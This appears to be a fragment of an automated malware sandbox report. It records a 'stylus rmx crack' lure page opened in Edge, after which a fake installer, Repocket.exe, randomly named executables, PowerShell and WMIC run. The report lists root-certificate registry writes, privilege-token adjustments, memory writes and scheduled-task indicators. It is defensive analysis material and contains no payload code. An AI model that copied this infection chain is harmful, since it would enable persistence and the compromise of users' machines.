85c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e Upy76WritOeZU.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 5c000000010000000400000000100000190000000100000010000000ffac207997bb2cfe865570179ee037b9030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e41d0000000100000010000000a86dc6a233eb339610f3ed414927c559140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac899880b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e199604000000010000001000000078f2fcaa601f2fb4ebc937ba532e75492000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e Upy76WritOeZU.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B7AB3308D1EA4477BA1480125A6FBDA936490CBB Repocket.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B7AB3308D1EA4477BA1480125A6FBDA936490CBB\Blob = 040000000100000010000000866912c070f1ecacacc2d5bca55ba1290f0000000100000020000000489ff6233f3d3c5da77604be230745657fe488cb05257da551bfd64c1f179e720b0000000100000052000000530053004c002e0063006f006d00200052006f006f0074002000430065007200740069006600690063006100740069006f006e00200041007500740068006f0072006900740079002000520053004100000009000000010000004c000000304a06082b0601050507030206082b06010505070303060a2b0601040182370a030c060a2b0601040182370a030406082b0601050507030406082b0601050507030106082b0601050507030862000000010000002000000085666a562ee0be5ce925c1d8890a6f76a87ec16d4d7d5f29ea7419cf20123b69140000000100000014000000dd040907a2f57a7d5253129295ee3880250da6591d00000001000000100000000d48ee33d7f1af8f4b002527f82a344a030000000100000014000000b7ab3308d1ea4477ba1480125a6fbda936490cbb190000000100000010000000787d09f953c59978ecd8d6e44b38e24f2000000001000000e1050000308205dd308203c5a00302010202087b2c9bd316803299300d06092a864886f70d01010b0500307c310b3009060355040613025553310e300c06035504080c0554657861733110300e06035504070c07486f7573746f6e31183016060355040a0c0f53534c20436f72706f726174696f6e3131302f06035504030c2853534c2e636f6d20526f6f742043657274696669636174696f6e20417574686f7269747920525341301e170d3136303231323137333933395a170d3431303231323137333933395a307c310b3009060355040613025553310e300c06035504080c0554657861733110300e06035504070c07486f7573746f6e31183016060355040a0c0f53534c20436f72706f726174696f6e3131302f06035504030c2853534c2e636f6d20526f6f742043657274696669636174696f6e20417574686f726974792052534130820222300d06092a864886f70d01010105000382020f003082020a0282020100f90fdda32b7dcbd02afeec6785a6e72e1bba77e1e3f5afa4ecfa4a5d91c457476b18776b76f2fd93e43d0fc2169e0b66c356949e178385ce56eff216fd0062f5220954e865174e41b9e04f4697aa1bc8b86e625e69b15fdb2a027efc6ccaf341d8edd0e8fc3f6148edb003141d100e4b19e0bb4eec8665ff36f35e67020b9d865561fd7a38edfee21900b76fa1506275743ca0fac82592b46e7a22c7f81ea1e3b2dd9131ab2b1d04ffa54a0437e985a4332bfde2d655347c19a44a68c7b2a8d3b7caa19388ebc197bc8cf91dd922842474c7043d6aa92993ccebb85be1fe5f25aa3458c8c123549d1b9811c3389c7e3d866ca50f40867c02f45c024f28cbae719f0f3ac833fe112535eafcbac5603dd97c18d5b2a9d37578037222ca3ac31fef2ce52ea9fa9e2cb65146fdaf03d6ea6068ea8516366b85e91ec0b3ddc424dc802a81416d943ec8e0c98141009e5ebf7fc50898a2182c4240b3f96f38274b4e80f43d8147e0887cea1cceb5755c512e1c2b7f1a7228e700b5d174c6d7e49fad0793b6533535fc37e4c3f65d16be2173de920af8a0636abc96926a3ef8bc65559bdef50d892604fc251aa62569cbc26dca7ce2595f97acebef2ec8bcd71b593c2bccf219c8936b276319cffce926f8ca719b7f93fe3467844e99ebfcb378093370ba66a676ed1b73eb1aa50dc422132094560a4e2c6c4eb1fdcf9c09baa233ed870203010001a3633061301d0603551d0e04160414dd040907a2f57a7d5253129295ee3880250da659300f0603551d130101ff040530030101ff301f0603551d23041830168014dd040907a2f57a7d5253129295ee3880250da659300e0603551d0f0101ff040403020186300d06092a864886f70d01010b050003820201002018119429fb269d1c1e1e7061f19572937124ad6893588e32af1bb37003fc252b7485903d786af4b98ba5973bb51891bb1ea7f9405b91f95599af1e11d05c1da766e3b194070c3239a6ea1bb079d81d9c7044e38addc4f9951f8a38433f0185a547a73d46b2bce52268f77b9cd82c3e0a21c82d33acbfc581993174c17571c5beb1f02345f49d6bfc19639da3bc04c6180b25bb53890fb38050de45ee447fab94786498d3f628dd87d8706574fb0eb913eba70f61a93296ccdebbed634c18bba940f7a0546e2088717518ea7ab43472e02327775cb690ea862540abef330fcb9f82bea220fbf6b52d1ae6c285b1740ffbc86502a4520147dd4922c1bfd8eb6bac7edeec633315b723088fc60f8d415add8ec5b98fe5453f78dbbad21b40b1fe714d3fe081a2ba5eb4ec15e093dd081f7ee155990b21de939e0afbe6a349bd3630fee777b2a07597b52d8188176520f7da90009fc952cc32ca357cf53d0fd82bd7f5266cc906349616ea70591a3279790bb6887f0f52483dbf6cd8a2442ed14eb77258d3891395fe44abf8d78b1b6e9cbc2ca05bd56a00af5f37e1d5fa100b989c86e7268fcef0ec6e8a570b80e34eb2c0a0636190ba556837746ab692db9fa18622b665270eecb69f4260e467c2b5da410bc4d38b611bbcfa1f912bd744075eba29acd9c5e9ef53485aeb80f1285821cdb00655fb273f539070a9041e5727b9 Repocket.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B7AB3308D1EA4477BA1480125A6FBDA936490CBB\Blob = 5c000000010000000400000000100000190000000100000010000000787d09f953c59978ecd8d6e44b38e24f030000000100000014000000b7ab3308d1ea4477ba1480125a6fbda936490cbb1d00000001000000100000000d48ee33d7f1af8f4b002527f82a344a140000000100000014000000dd040907a2f57a7d5253129295ee3880250da65962000000010000002000000085666a562ee0be5ce925c1d8890a6f76a87ec16d4d7d5f29ea7419cf20123b6909000000010000004c000000304a06082b0601050507030206082b06010505070303060a2b0601040182370a030c060a2b0601040182370a030406082b0601050507030406082b0601050507030106082b060105050703080b0000000100000052000000530053004c002e0063006f006d00200052006f006f0074002000430065007200740069006600690063006100740069006f006e00200041007500740068006f007200690074007900200052005300410000000f0000000100000020000000489ff6233f3d3c5da77604be230745657fe488cb05257da551bfd64c1f179e72040000000100000010000000866912c070f1ecacacc2d5bca55ba1292000000001000000e1050000308205dd308203c5a00302010202087b2c9bd316803299300d06092a864886f70d01010b0500307c310b3009060355040613025553310e300c06035504080c0554657861733110300e06035504070c07486f7573746f6e31183016060355040a0c0f53534c20436f72706f726174696f6e3131302f06035504030c2853534c2e636f6d20526f6f742043657274696669636174696f6e20417574686f7269747920525341301e170d3136303231323137333933395a170d3431303231323137333933395a307c310b3009060355040613025553310e300c06035504080c0554657861733110300e06035504070c07486f7573746f6e31183016060355040a0c0f53534c20436f72706f726174696f6e3131302f06035504030c2853534c2e636f6d20526f6f742043657274696669636174696f6e20417574686f726974792052534130820222300d06092a864886f70d01010105000382020f003082020a0282020100f90fdda32b7dcbd02afeec6785a6e72e1bba77e1e3f5afa4ecfa4a5d91c457476b18776b76f2fd93e43d0fc2169e0b66c356949e178385ce56eff216fd0062f5220954e865174e41b9e04f4697aa1bc8b86e625e69b15fdb2a027efc6ccaf341d8edd0e8fc3f6148edb003141d100e4b19e0bb4eec8665ff36f35e67020b9d865561fd7a38edfee21900b76fa1506275743ca0fac82592b46e7a22c7f81ea1e3b2dd9131ab2b1d04ffa54a0437e985a4332bfde2d655347c19a44a68c7b2a8d3b7caa19388ebc197bc8cf91dd922842474c7043d6aa92993ccebb85be1fe5f25aa3458c8c123549d1b9811c3389c7e3d866ca50f40867c02f45c024f28cbae719f0f3ac833fe112535eafcbac5603dd97c18d5b2a9d37578037222ca3ac31fef2ce52ea9fa9e2cb65146fdaf03d6ea6068ea8516366b85e91ec0b3ddc424dc802a81416d943ec8e0c98141009e5ebf7fc50898a2182c4240b3f96f38274b4e80f43d8147e0887cea1cceb5755c512e1c2b7f1a7228e700b5d174c6d7e49fad0793b6533535fc37e4c3f65d16be2173de920af8a0636abc96926a3ef8bc65559bdef50d892604fc251aa62569cbc26dca7ce2595f97acebef2ec8bcd71b593c2bccf219c8936b276319cffce926f8ca719b7f93fe3467844e99ebfcb378093370ba66a676ed1b73eb1aa50dc422132094560a4e2c6c4eb1fdcf9c09baa233ed870203010001a3633061301d0603551d0e04160414dd040907a2f57a7d5253129295ee3880250da659300f0603551d130101ff040530030101ff301f0603551d23041830168014dd040907a2f57a7d5253129295ee3880250da659300e0603551d0f0101ff040403020186300d06092a864886f70d01010b050003820201002018119429fb269d1c1e1e7061f19572937124ad6893588e32af1bb37003fc252b7485903d786af4b98ba5973bb51891bb1ea7f9405b91f95599af1e11d05c1da766e3b194070c3239a6ea1bb079d81d9c7044e38addc4f9951f8a38433f0185a547a73d46b2bce52268f77b9cd82c3e0a21c82d33acbfc581993174c17571c5beb1f02345f49d6bfc19639da3bc04c6180b25bb53890fb38050de45ee447fab94786498d3f628dd87d8706574fb0eb913eba70f61a93296ccdebbed634c18bba940f7a0546e2088717518ea7ab43472e02327775cb690ea862540abef330fcb9f82bea220fbf6b52d1ae6c285b1740ffbc86502a4520147dd4922c1bfd8eb6bac7edeec633315b723088fc60f8d415add8ec5b98fe5453f78dbbad21b40b1fe714d3fe081a2ba5eb4ec15e093dd081f7ee155990b21de939e0afbe6a349bd3630fee777b2a07597b52d8188176520f7da90009fc952cc32ca357cf53d0fd82bd7f5266cc906349616ea70591a3279790bb6887f0f52483dbf6cd8a2442ed14eb77258d3891395fe44abf8d78b1b6e9cbc2ca05bd56a00af5f37e1d5fa100b989c86e7268fcef0ec6e8a570b80e34eb2c0a0636190ba556837746ab692db9fa18622b665270eecb69f4260e467c2b5da410bc4d38b611bbcfa1f912bd744075eba29acd9c5e9ef53485aeb80f1285821cdb00655fb273f539070a9041e5727b9 Repocket.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1904 msedge.exe 1904 msedge.exe 3716 msedge.exe 3716 msedge.exe 5144 identity_helper.exe 5144 identity_helper.exe 4132 msedge.exe 4132 msedge.exe 2312 how-to-install-stylu_CmOTJyRsix.tmp 2312 how-to-install-stylu_CmOTJyRsix.tmp 4440 kmedia.exe 4440 kmedia.exe 4440 kmedia.exe 4440 kmedia.exe 3192 powershell.exe 3192 powershell.exe 1580 powershell.exe 1580 powershell.exe 1580 powershell.exe 3192 powershell.exe 5400 Fdigx6RE2ZstV.exe 5400 Fdigx6RE2ZstV.exe 5400 Fdigx6RE2ZstV.exe 5400 Fdigx6RE2ZstV.exe 5400 Fdigx6RE2ZstV.exe 2836 powershell.exe 2836 powershell.exe 6000 powershell.exe 6000 powershell.exe 6000 powershell.exe 2836 powershell.exe 1208 powershell.exe 1208 powershell.exe 1208 powershell.exe 4256 powershell.exe 4256 powershell.exe 4256 powershell.exe 5736 mL58FJENjTIb9.exe 5736 mL58FJENjTIb9.exe 5736 mL58FJENjTIb9.exe 5700 powershell.exe 5700 powershell.exe 5700 powershell.exe 768 powershell.exe 768 powershell.exe 768 powershell.exe 4440 kmedia.exe 4440 kmedia.exe 1144 powershell.exe 1144 powershell.exe 1144 powershell.exe 1360 msedge.exe 1360 msedge.exe 1360 msedge.exe 1360 msedge.exe 1864 powershell.exe 1864 powershell.exe 1864 powershell.exe 2948 powershell.EXE 2948 powershell.EXE 2948 powershell.EXE 4308 powershell.exe 4308 powershell.exe 4308 powershell.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 16 IoCs
pid Process 3716 msedge.exe 3716 msedge.exe 3716 msedge.exe 3716 msedge.exe 3716 msedge.exe 3716 msedge.exe 3716 msedge.exe 3716 msedge.exe 3716 msedge.exe 3716 msedge.exe 3716 msedge.exe 3716 msedge.exe 3716 msedge.exe 3716 msedge.exe 3716 msedge.exe 3716 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 3192 powershell.exe Token: SeDebugPrivilege 1580 powershell.exe Token: SeDebugPrivilege 2836 powershell.exe Token: SeDebugPrivilege 6000 powershell.exe Token: SeDebugPrivilege 1208 powershell.exe Token: SeDebugPrivilege 5736 mL58FJENjTIb9.exe Token: SeDebugPrivilege 4256 powershell.exe Token: SeDebugPrivilege 5700 powershell.exe Token: SeIncreaseQuotaPrivilege 4256 WMIC.exe Token: SeSecurityPrivilege 4256 WMIC.exe Token: SeTakeOwnershipPrivilege 4256 WMIC.exe Token: SeLoadDriverPrivilege 4256 WMIC.exe Token: SeSystemProfilePrivilege 4256 WMIC.exe Token: SeSystemtimePrivilege 4256 WMIC.exe Token: SeProfSingleProcessPrivilege 4256 WMIC.exe Token: SeIncBasePriorityPrivilege 4256 WMIC.exe Token: SeCreatePagefilePrivilege 4256 WMIC.exe Token: SeBackupPrivilege 4256 WMIC.exe Token: SeRestorePrivilege 4256 WMIC.exe Token: SeShutdownPrivilege 4256 WMIC.exe Token: SeDebugPrivilege 4256 WMIC.exe Token: SeSystemEnvironmentPrivilege 4256 WMIC.exe Token: SeRemoteShutdownPrivilege 4256 WMIC.exe Token: SeUndockPrivilege 4256 WMIC.exe Token: SeManageVolumePrivilege 4256 WMIC.exe Token: 33 4256 WMIC.exe Token: 34 4256 WMIC.exe Token: 35 4256 WMIC.exe Token: 36 4256 WMIC.exe Token: SeIncreaseQuotaPrivilege 4256 WMIC.exe Token: SeSecurityPrivilege 4256 WMIC.exe Token: SeTakeOwnershipPrivilege 4256 WMIC.exe Token: SeLoadDriverPrivilege 4256 WMIC.exe Token: SeSystemProfilePrivilege 4256 WMIC.exe Token: SeSystemtimePrivilege 4256 WMIC.exe Token: SeProfSingleProcessPrivilege 4256 WMIC.exe Token: SeIncBasePriorityPrivilege 4256 WMIC.exe Token: SeCreatePagefilePrivilege 4256 WMIC.exe Token: SeBackupPrivilege 4256 WMIC.exe Token: SeRestorePrivilege 4256 WMIC.exe Token: SeShutdownPrivilege 4256 WMIC.exe Token: SeDebugPrivilege 4256 WMIC.exe Token: SeSystemEnvironmentPrivilege 4256 WMIC.exe Token: SeRemoteShutdownPrivilege 4256 WMIC.exe Token: SeUndockPrivilege 4256 WMIC.exe Token: SeManageVolumePrivilege 4256 WMIC.exe Token: 33 4256 WMIC.exe Token: 34 4256 WMIC.exe Token: 35 4256 WMIC.exe Token: 36 4256 WMIC.exe Token: SeDebugPrivilege 768 powershell.exe Token: SeDebugPrivilege 3488 Repocket.exe Token: SeDebugPrivilege 1144 powershell.exe Token: SeDebugPrivilege 1864 powershell.exe Token: SeDebugPrivilege 2948 powershell.EXE Token: SeDebugPrivilege 4308 powershell.exe Token: SeDebugPrivilege 5708 powershell.exe Token: SeAssignPrimaryTokenPrivilege 3036 WMIC.exe Token: SeIncreaseQuotaPrivilege 3036 WMIC.exe Token: SeSecurityPrivilege 3036 WMIC.exe Token: SeTakeOwnershipPrivilege 3036 WMIC.exe Token: SeLoadDriverPrivilege 3036 WMIC.exe Token: SeSystemtimePrivilege 3036 WMIC.exe Token: SeBackupPrivilege 3036 WMIC.exe -
Suspicious use of FindShellTrayWindow 36 IoCs
pid Process 3716 msedge.exe 3716 msedge.exe 3716 msedge.exe 3716 msedge.exe 3716 msedge.exe 3716 msedge.exe 3716 msedge.exe 3716 msedge.exe 3716 msedge.exe 3716 msedge.exe 3716 msedge.exe 3716 msedge.exe 3716 msedge.exe 3716 msedge.exe 3716 msedge.exe 3716 msedge.exe 3716 msedge.exe 3716 msedge.exe 3716 msedge.exe 3716 msedge.exe 3716 msedge.exe 3716 msedge.exe 3716 msedge.exe 3716 msedge.exe 3716 msedge.exe 3716 msedge.exe 3716 msedge.exe 3716 msedge.exe 3716 msedge.exe 3716 msedge.exe 3716 msedge.exe 3716 msedge.exe 3716 msedge.exe 3716 msedge.exe 2312 how-to-install-stylu_CmOTJyRsix.tmp 3716 msedge.exe -
Suspicious use of SendNotifyMessage 24 IoCs
pid Process 3716 msedge.exe 3716 msedge.exe 3716 msedge.exe 3716 msedge.exe 3716 msedge.exe 3716 msedge.exe 3716 msedge.exe 3716 msedge.exe 3716 msedge.exe 3716 msedge.exe 3716 msedge.exe 3716 msedge.exe 3716 msedge.exe 3716 msedge.exe 3716 msedge.exe 3716 msedge.exe 3716 msedge.exe 3716 msedge.exe 3716 msedge.exe 3716 msedge.exe 3716 msedge.exe 3716 msedge.exe 3716 msedge.exe 3716 msedge.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3716 wrote to memory of 4280 3716 msedge.exe 83 PID 3716 wrote to memory of 4280 3716 msedge.exe 83 PID 3716 wrote to memory of 3640 3716 msedge.exe 84 PID 3716 wrote to memory of 3640 3716 msedge.exe 84 PID 3716 wrote to memory of 3640 3716 msedge.exe 84 PID 3716 wrote to memory of 3640 3716 msedge.exe 84 PID 3716 wrote to memory of 3640 3716 msedge.exe 84 PID 3716 wrote to memory of 3640 3716 msedge.exe 84 PID 3716 wrote to memory of 3640 3716 msedge.exe 84 PID 3716 wrote to memory of 3640 3716 msedge.exe 84 PID 3716 wrote to memory of 3640 3716 msedge.exe 84 PID 3716 wrote to memory of 3640 3716 msedge.exe 84 PID 3716 wrote to memory of 3640 3716 msedge.exe 84 PID 3716 wrote to memory of 3640 3716 msedge.exe 84 PID 3716 wrote to memory of 3640 3716 msedge.exe 84 PID 3716 wrote to memory of 3640 3716 msedge.exe 84 PID 3716 wrote to memory of 3640 3716 msedge.exe 84 PID 3716 wrote to memory of 3640 3716 msedge.exe 84 PID 3716 wrote to memory of 3640 3716 msedge.exe 84 PID 3716 wrote to memory of 3640 3716 msedge.exe 84 PID 3716 wrote to memory of 3640 3716 msedge.exe 84 PID 3716 wrote to memory of 3640 3716 msedge.exe 84 PID 3716 wrote to memory of 3640 3716 msedge.exe 84 PID 3716 wrote to memory of 3640 3716 msedge.exe 84 PID 3716 wrote to memory of 3640 3716 msedge.exe 84 PID 3716 wrote to memory of 3640 3716 msedge.exe 84 PID 3716 wrote to memory of 3640 3716 msedge.exe 84 PID 3716 wrote to memory of 3640 3716 msedge.exe 84 PID 3716 wrote to memory of 3640 3716 msedge.exe 84 PID 3716 wrote to memory of 3640 3716 msedge.exe 84 PID 3716 wrote to memory of 3640 3716 msedge.exe 84 PID 3716 wrote to memory of 3640 3716 msedge.exe 84 PID 3716 wrote to memory of 3640 3716 msedge.exe 84 PID 3716 wrote to memory of 3640 3716 msedge.exe 84 PID 3716 wrote to memory of 3640 3716 msedge.exe 84 PID 3716 wrote to memory of 3640 3716 msedge.exe 84 PID 3716 wrote to memory of 3640 3716 msedge.exe 84 PID 3716 wrote to memory of 3640 3716 msedge.exe 84 PID 3716 wrote to memory of 3640 3716 msedge.exe 84 PID 3716 wrote to memory of 3640 3716 msedge.exe 84 PID 3716 wrote to memory of 3640 3716 msedge.exe 84 PID 3716 wrote to memory of 3640 3716 msedge.exe 84 PID 3716 wrote to memory of 1904 3716 msedge.exe 85 PID 3716 wrote to memory of 1904 3716 msedge.exe 85 PID 3716 wrote to memory of 2584 3716 msedge.exe 86 PID 3716 wrote to memory of 2584 3716 msedge.exe 86 PID 3716 wrote to memory of 2584 3716 msedge.exe 86 PID 3716 wrote to memory of 2584 3716 msedge.exe 86 PID 3716 wrote to memory of 2584 3716 msedge.exe 86 PID 3716 wrote to memory of 2584 3716 msedge.exe 86 PID 3716 wrote to memory of 2584 3716 msedge.exe 86 PID 3716 wrote to memory of 2584 3716 msedge.exe 86 PID 3716 wrote to memory of 2584 3716 msedge.exe 86 PID 3716 wrote to memory of 2584 3716 msedge.exe 86 PID 3716 wrote to memory of 2584 3716 msedge.exe 86 PID 3716 wrote to memory of 2584 3716 msedge.exe 86 PID 3716 wrote to memory of 2584 3716 msedge.exe 86 PID 3716 wrote to memory of 2584 3716 msedge.exe 86 PID 3716 wrote to memory of 2584 3716 msedge.exe 86 PID 3716 wrote to memory of 2584 3716 msedge.exe 86 PID 3716 wrote to memory of 2584 3716 msedge.exe 86 PID 3716 wrote to memory of 2584 3716 msedge.exe 86 PID 3716 wrote to memory of 2584 3716 msedge.exe 86 PID 3716 wrote to memory of 2584 3716 msedge.exe 86 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://opensea.io/collection/how-to-install-stylus-rmx-crack-hot1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3716 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe39fc46f8,0x7ffe39fc4708,0x7ffe39fc47182⤵PID:4280
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2024,7352388270336205163,8219541241851807050,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2056 /prefetch:22⤵PID:3640
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2024,7352388270336205163,8219541241851807050,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2464 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
PID:1904
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2024,7352388270336205163,8219541241851807050,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2868 /prefetch:82⤵PID:2584
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2024,7352388270336205163,8219541241851807050,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3228 /prefetch:12⤵PID:3252
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2024,7352388270336205163,8219541241851807050,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3240 /prefetch:12⤵PID:1952
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2024,7352388270336205163,8219541241851807050,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4980 /prefetch:12⤵PID:1000
-
-
